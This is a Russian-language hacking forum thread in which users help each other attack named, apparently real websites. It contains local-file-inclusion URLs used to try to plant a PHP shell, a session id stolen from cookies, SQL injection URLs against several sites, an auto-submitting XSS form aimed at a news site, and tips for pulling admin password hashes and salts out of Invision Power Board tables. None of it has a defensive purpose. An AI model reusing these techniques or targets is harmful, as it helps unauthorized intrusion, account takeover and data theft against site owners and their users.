Да нафиг ты мне пути даешь? и Скулю. Это то все и сам могу. Мне интересно как шелл залить... И через этот менеджер только картинки и то ограниченные. А как пхп залить?

547
Ну так посмотри что туда пишется, пиши и инклудь. В чём проблема-то?
Если это error_log то возможно туда пишется Referer
referer туда точно непишется-он вообще непередается...
и я неуверен што это лог апача...

вообщем выкладую смотрим все и думаем кто что сможет:)
http://www.daniel.mitchell.name/cameras/index.php?page=../../../../../../../../../../proc/self/fd/2%00

Вот такая фишка на одном сайте:
Можно зарегать любой ник/пароль.Тоесть на символы никакой фильтрации:
"Здравствуйте, ' or 1=1/*."
Вот незнаю,можно ли что-нибудь дальше сделать?Подскажете на какие уязвимости можно проверить?

Вот такая фишка на одном сайте:
Можно зарегать любой ник/пароль.Тоесть на символы никакой фильтрации:
"Здравствуйте, ' or 1=1/*."
Вот незнаю,можно ли что-нибудь дальше сделать?Подскажете на какие уязвимости можно проверить?

ну этоже инжекция, попробуй войти в админку такимже способом:), а там уже будет видно што дальше...

В смысле это просто определяется как логин и пароль,можно любые символы использовать.А если пароль другой ставить,то не войдешь.

В смысле это просто определяется как логин и пароль,можно любые символы использовать.А если пароль другой ставить,то не войдешь.
ну это ты вводиш когда заходиш в админ-панель сайта или при регистрации нового пользователя(сайта или форума)?
вообщето это часто встречающийся баг в админ панелях написаных на АСП...

Я сначала зарегился с таким логином и паролем,потому под ними вошел

referer туда точно непишется-он вообще непередается...
и я неуверен што это лог апача...

вообщем выкладую смотрим все и думаем кто что сможет:)
http://www.daniel.mitchell.name/cameras/index.php?page=../../../../../../../../../../proc/self/fd/2%00
Можно сессию проинклудить,а как там что записать сам смотри.
http://www.daniel.mitchell.name/cameras/index.php?page=../../../../../../../../../../../../../../hermes/bosweb/web189/b1892/ipw.pheugoco/public_html/sessions/sess_ff6016f506bb56fba96b5e9d32be6954%00

Вот такая фишка на одном сайте:
Можно зарегать любой ник/пароль.Тоесть на символы никакой фильтрации:
"Здравствуйте, ' or 1=1/*."
Вот незнаю,можно ли что-нибудь дальше сделать?Подскажете на какие уязвимости можно проверить?

Ну в регистрации точно багов нету :)

http://kmv.multinex.ru/forum/ucp.php?i=pm&mode=compose&action=post&sid=af0b2ef2bab53326aaa67074a61c4a0d%20AND%201=1

это скуля?


http://kmv.multinex.ru/forum/styles/
http://kmv.multinex.ru/forum/styles/prosilver/
http://kmv.multinex.ru/forum/styles/prosilver/imageset/
http://kmv.multinex.ru/forum/styles/prosilver/template/
http://kmv.multinex.ru/forum/styles/prosilver/theme/
http://kmv.multinex.ru/forum/styles/prosilver/theme/images/


и вот еще что нашел

Можно сессию проинклудить,а как там что записать сам смотри.




Ну в регистрации точно багов нету :)

а сессию ты из куков тырил?

а сессию ты из куков тырил?

да

http://kmv.multinex.ru/forum/ucp.php?i=pm&mode=compose&action=post&sid=af0b2ef2bab53326aaa67074a61c4a0d%20AND%201=1
это скуля?


Скулю не наблюдаю. Мб нужно зарегиться ?..

referer туда точно непишется-он вообще непередается...
и я неуверен што это лог апача...


Гугл спешит на помощь. Третья ссылка с выдачи по запросу proc/self/fd/2

http://www.xakep.ru/post/49808/


Теперь настал черед попробовать проинклудить логи. Путем нехитрого подбора выяснилось, что апачевский error_log находится в /proc/self/fd/2 (будем юзать именно его, так как access_log для такого сайта наверняка будет размером в пару-тройку гигабайт, которые окажутся неподвластными для LFI).

Зачастую в error_log записывается без всякой фильтрации переменная referer, в которую как раз таки и можно проинжектить наш PHP-код. Осталось только вызвать ошибку, которая и запишется в лог. Самой легко выполнимой является ошибка следующего формата:

[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

и тд

Скулю не наблюдаю. Мб нужно зарегиться ?..



Гугл спешит на помощь. Третья ссылка с выдачи по запросу proc/self/fd/2

http://www.xakep.ru/post/49808/


и тд

да читал я эту статейку:)
но вот практика с теорией несовпала...
ты выше читай мы уже обсуждали там немного? там ошибочные сессии пхп хранит, короче необязательно что /proc/self/fd/2 -это логи апача...

Скажите, возможно ли провести XSS атаку на сайте, если сайт через яваскрипт генерирует, что то типа временной сессии, без которой посылает нах запрос ?

Вот пример. Сайт РСН:
http://rusnovosti.ru/
Если в поиске вписать <script>alert()</script> то высвечивается алерт.
Так вот, собрался я было делать боевой HTML код для фрейма, но тут обломилось.
Я юзаю такую вещь для проверки:

<body onload="p.submit()">
<form action="http://rusnovosti.ru/search/" method="post" id="p">
<input type=hidden name="search" value="<script>alert()</script>">

(Поскольку данные передаются через POST), но желаемый alert не выскакивает.
Когда же я копнул запрос, то обнаружил в нем кучу всякого рода значений, и зашифрованную в base64 какую то инфу чуть не на 10 килобайт (которую так и не удалось расшифровать).
Ну вот собственно вопрос, в этом случае возможна ли полноценная XSS атака на этот сайт? Или XSS тут использовать бесполезно?

Можно сессию проинклудить,а как там что записать сам смотри.




Ну в регистрации точно багов нету :)

сессию проинклудить невыйшло:(
какие еще соображения по этому сайтику и по этой баге..

Возник такой вопрос есть сайт, я знаю что там есть еще какие то страницы на нем. Но я не знаю их путь. Как их можно обнаружить? Т.е допустим сайт www.blabla/ololo/1/... и вот в папке 1 есть еще какие то страницы доступные для просмотра. Как их можно узнать ?

можешь посмотреть что знает гугл о сайте
https://forum.antichat.ru/threadnav35340-1-10.html

Нашёл на сайте инъекцию, подобрал поля, но при попытке вытащить что-либо из другой таблицы, например "users"(+union+select+1+from+users), получаю следующее:

Error Message: (1146) Table 'knowledge.users' doesn't exist

То есть тут как я понял значения можно получать только из таблицы "knowledge". Можно ли это исправить?

Нашёл на сайте инъекцию, подобрал поля, но при попытке вытащить что-либо из другой таблицы, например "users"(+union+select+1+from+users), получаю следующее:



То есть тут как я понял значения можно получать только из таблицы "knowledge". Можно ли это исправить?
Нет. это значит, что таблицы users нету. Подбирай таблицы, а потом уже думай о том, как данные из них вытащить.

То есть тут как я понял значения можно получать только из таблицы "knowledge". Можно ли это исправить?

from+somebase.users

Подскажите пожалуйсто, в IPB 2.3.6 к примеру где там соль в БД. облазил таблицу IBF_MEMBERS, там токо хэш, а соли нету. Подскажите плиз как достать и где.

мб ibf_members_converge ?

Нет. это значит, что таблицы users нету. Подбирай таблицы, а потом уже думай о том, как данные из них вытащить.

from+somebase.users

Да, действительно так. Я просто решил что "knowledge" - это автоматически подставляемое имя колонки, а не имя бд. Спасибо за подсказку

scorpic393, бывает пасы и без соли хешируются

подскажите пожайлуста как узнать абсолютный путь в phpmyadmin

scorpic393, бывает пасы и без соли хешируются
Да бывает, когда пасс длинный - соль не нужна...

мб ibf_members_converge ?
Пасиб, интересно получаеться

ibf_members_converge

converge_id
converge_email
converge_joined
converge_pass_hash
converge_pass_salt

а есть ещё табла
ibf_members

Полные тексты id name mgroup email joined ip_address posts title allow_admin_mails time_offset hide_email email_pm email_full skin warn_level warn_lastwarn language last_post restrict_post view_sigs view_img view_avs view_pop bday_day bday_month bday_year new_msg msg_total show_popup misc last_visit last_activity dst_in_use view_prefs coppa_user mod_posts auto_track temp_ban sub_end login_anonymous ignored_users mgroup_others org_perm_id member_login_key member_login_key_expire subs_pkg_chosen has_blog has_gallery members_markers members_editor_choice members_auto_dst members_display_name members_created_remote members_cache members_disable_pm members_l_display_name members_l_username failed_logins failed_login_count members_profile_views

member_login_key и converge_pass_hash - разные значения у того же юзера. из какой таблы надо вытянуть хэши и соль админа? чё тото както запутана, подобного ещё не видел

2 Gorev:

во все параметры (если их нет - неудачно зарегистрируйся:)) подставляй "[]", " ' " и прочее

2 scorpic393:

converge_pass_hash
converge_pass_salt

а по converge_id определишь, кому принадлежит (id на форуме)

2 scorpic393:

converge_pass_hash
converge_pass_salt

а по converge_id определишь, кому принадлежит (id на форуме)

пассиб пашка

http://www.realto.ru/guide/plan_home/show/?id_home=46+ORDER+BY+1
http://www.kvartirant.ru/catalog/?tree=15&from=300+and+1=1+--+

вот нашел 2 скули но не могу понять как продвинутся дальше, ордер не помогает, подскажите что можно придумать?

вот нашел 2 скули но не могу понять как продвинутся дальше, ордер не помогает, подскажите что можно придумать?
1. Строка обрезается до семи символов.
2. Инъекция в лимите.

Никакую из этих инъекций не раскрутить.

Ошибка.
You have an error in your SQL syntax near 'order by 1+--+-,20' at line 18
Добавляется ,20 ,не получается закомментировать запрос. Все перебрал.
Где то тут видел подобный вопрос, не могу найти,возможно уже отвечали.
More адын row и подзапросы крайне неудобно юзать. Возможно иньекция в лимите? При таком раскладе крутить только подзапросами, либо есть альтернативный способ?

Ошибка.

Добавляется ,20 ,не получается закомментировать запрос. Все перебрал.
Где то тут видел подобный вопрос, не могу найти,возможно уже отвечали.
More адын row и подзапросы крайне неудобно юзать. Возможно иньекция в лимите? При таком раскладе крутить только подзапросами, либо есть альтернативный способ?
/*...

You have an error in your SQL syntax near 'order by 1+--+-,20' at line 18

Делай /**/order/**/by/**/1/*

Прикалываешься? =) Я всё перепробовал.Запрос не режется, при чём тут... Фильтрации нет на +, так я пробовал в первую очередь.

?id=10/**/OrDeR/**/bY/**/1/*&print=1

и так тоже пробовал.

Кто хочет помочь поковырять-в пм.Дам линк.Но не со вчерашней регой.Ресурсы серьёзные.

More адын row и подзапросы крайне неудобно юзать. Возможно иньекция в лимите? При таком раскладе крутить только подзапросами, либо есть альтернативный способ?
Если инъекция в лимите (а судя по ошибке так оно и есть), то ни о каких подзапросах речи быть не может.
Единственный вариант если там нет order by то расскручивать как обычно, или если file_priv = Y
https://forum.antichat.ru/showpost.php?p=1305000&postcount=125
Других нет
Запрос не режется
С чего ты взял? Хотя это не важно

Подскажите плиз.
Есть скуля на сайте где стоит форум IPB, допустим в бажном скрипте такой запрос

SELECT * FROM news WHERE id='$_GET[id]'

могу ли так сделать

SELECT * FR0M news WHERE id='1' + UNION + INSERT into members (bla,bla,...) VALUES (bla,bla,...);

т.е. вместо UNION SELECT написать другое например UNION INSERT или UNION DELETE , или с помощью UNION можно только SELECT юзать?